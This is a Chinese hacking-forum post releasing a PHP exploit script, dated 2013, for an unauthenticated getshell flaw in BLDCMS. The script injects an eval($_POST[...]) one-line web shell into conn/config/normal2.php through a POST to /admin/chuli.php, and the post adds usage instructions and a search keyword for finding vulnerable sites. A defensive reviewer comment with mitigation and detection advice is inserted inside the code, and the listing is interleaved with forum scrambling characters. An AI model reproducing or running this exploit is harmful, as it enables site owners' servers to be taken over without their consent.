之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
既然都有人发了 我就把我之前写好的EXP放出来吧
02.<!--?php
// Reviewer summary (defender view). The listing below is kept exactly as
// published, including the forum's scrambling text and gutter numbers.
//
// What the script does, as far as the visible lines show:
//   - Reads three CLI arguments: target host, CMS directory, and a password
//     that becomes the name of a POST field.
//   - Builds a form body with the fields sitename, qq, getcontent, tongji,
//     cmsmd5 and sqlite. The sqlite value starts with a single quote and a
//     semicolon, followed by an eval() of the chosen POST field.
//   - Sends that body in one HTTP/1.1 POST to /admin/chuli.php?action=a_1 on
//     port 80 with "User-Agent: MSIE". No Cookie or Authorization header is
//     set, so the endpoint is apparently reachable without an admin session.
//   - Drains the response without inspecting it, then prints
//     conn/config/normal2.php as the resulting location. The message is
//     printed unconditionally and is not evidence that anything was written.
//
// NOTE(review): chuli.php is not shown on this page. Presumably it copies the
// posted settings into a PHP file under conn/config/ inside a single-quoted
// string without escaping - confirm against the BLDCMS source.
//
// The banner states the precondition GPC=Off. magic_quotes_gpc was removed in
// PHP 5.4, so on any current PHP the quote arrives unescaped; the setting was
// never a substitute for escaping in the application itself.
//
// Mitigation for site owners:
//   - Require an authenticated admin session before chuli.php processes any
//     action, and restrict /admin/ at the web server as a second layer.
//   - Do not write request values into executable PHP. Store settings as data
//     (JSON/INI outside the web root), or serialise them with var_export().
//   - Make conn/config/ non-writable by the web server user where possible.
//
// Detection:
//   - Access logs: POST /admin/chuli.php?action=a_1 from clients with no prior
//     admin login, especially with the bare "MSIE" user agent.
//   - File integrity: unexpected changes to conn/config/normal2.php, or any
//     eval($_POST[...]) text inside files under conn/config/.
- A, B% T+ K; U" a* _/ ^1 {03.echo "-------------------------------------------------------------------8 N* B% H" K+ W& |/ D8 d$ s
04.
2 G( U1 r; N( Z6 c05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP6 j( X9 m! `0 \( y8 e* |
06. 8 R7 {* D: c6 k: D9 e' Q
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
1 F9 A# ]- `: h+ ]% a3 T08.
: ]4 A1 ?8 a) ?09.QQ:981009941\r\n 2013.3.21\r\n 6 t" g6 {8 `4 P% l# S$ r
10.
" m, J- w! u; _" U+ o6 Y& C9 ~( e11.
i4 M' h) ?2 V, R" o7 L12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
8 c$ G* d# b2 Z13. & x a/ c/ ^) [3 P* M7 e* M$ |
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 j# k0 A/ _: H! X15. 4 Y* l; n2 Q& H' X+ W
16.--------------------------------------------------------------------\r\n";0 I$ C+ Y+ ?. e& G$ b; b
17.$url=$argv[1];
9 s" C7 A) E) z. B+ F8 K h5 \18.$dir=$argv[2];: w; n: D t* G- H( s
19.$pass=$argv[3];
* |, j" K. ^7 X20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
$ V4 x E4 f- `21.if (emptyempty($pass)||emptyempty($url))
P# `; {6 s9 Z' Y22.{exit("请输入参数");}
]( y% }3 z7 C7 H23.else
/ r, _! H" V4 l7 {3 r24.{" \" u" ? L2 V5 I5 ]$ J; E+ w4 H3 ]
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
. Q( |3 P& B$ q5 }) P26. - o/ x$ P- }1 k4 E6 L
27.al;
4 M( @2 X/ o/ j; j" j# T28.$length = strlen($fuckdata);' z. u/ k, w$ Y% ]+ O5 u, g3 D
29.function getshell($url,$pass)' o7 X# s2 f9 A
30.{1 g1 z' C2 Y) t( g7 U6 K5 N
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
; f* h5 A/ l4 y) A% I5 O, _" f' h% G32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";! |/ k# c& M k0 T: L9 O
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
9 A9 ?8 C0 ~+ h3 }" z1 s' g34.$header .= "User-Agent: MSIE\r\n";6 B8 M) M* R: H2 @
35.$header .= "Host:".$url."\r\n";! A) x, o- N# X* W3 k
36.$header .= "Content-Length: ".$length."\r\n";
7 d! z0 f4 g+ i; M; `$ G37.$header .= "Connection: Close\r\n";
. O, B, n; J: l* K5 \38.$header .="\r\n"; Q# N; x' K$ T
39.$header .= $fuckdata."\r\n\r\n";7 k# _2 W) m! u& z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);1 ]7 S; k# _2 F- [: k6 |& m
41.if (!$fp)
$ G9 e/ }6 r; B6 ~0 V' j+ E42.{" i) n: q: c9 A2 p
43.exit ("利用失败:请检查指定目标是否能正常打开");8 G* ^* x6 x' k5 \! k U7 K0 I$ X
44.}
' m' a$ u c2 U" [; L45.else{ if (!fputs($fp,$header))
4 I9 z' ]0 _" v# i46.{exit ("利用失败");}
8 q3 q' H1 a7 M7 M- s47.else
5 v5 B8 g/ L5 i/ N V48.{
7 Q9 k/ |, B E3 L; r i! h49.$receive = '';" \0 L/ ~& ^+ z- g# N6 W
50.while (!feof($fp)) {
: D% ~0 Y2 ]' Y51.$receive .= @fgets($fp, 1000);
3 `2 Z* s. U! Z1 O4 d2 w% Y: @" u52.}
, \8 l# j0 h7 q$ X4 F$ l53.@fclose($fp);3 a4 `3 ^" w% N) u
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标5 v% A4 r8 f/ t* r/ q
55. & ?% \9 t6 n5 j" y% ], X# t" V
56.GPC是否=off)";
0 o6 Q- R6 K$ L" X# z. \9 f) N57.}}; `9 m% Q7 w O9 X0 [2 F
58.}7 o0 I. s4 k; J5 n
59.}. y) i# {& o, `' l& h$ U
60.getshell($url,$pass);
I8 E9 L, {0 i8 {61.?-->
by 数据流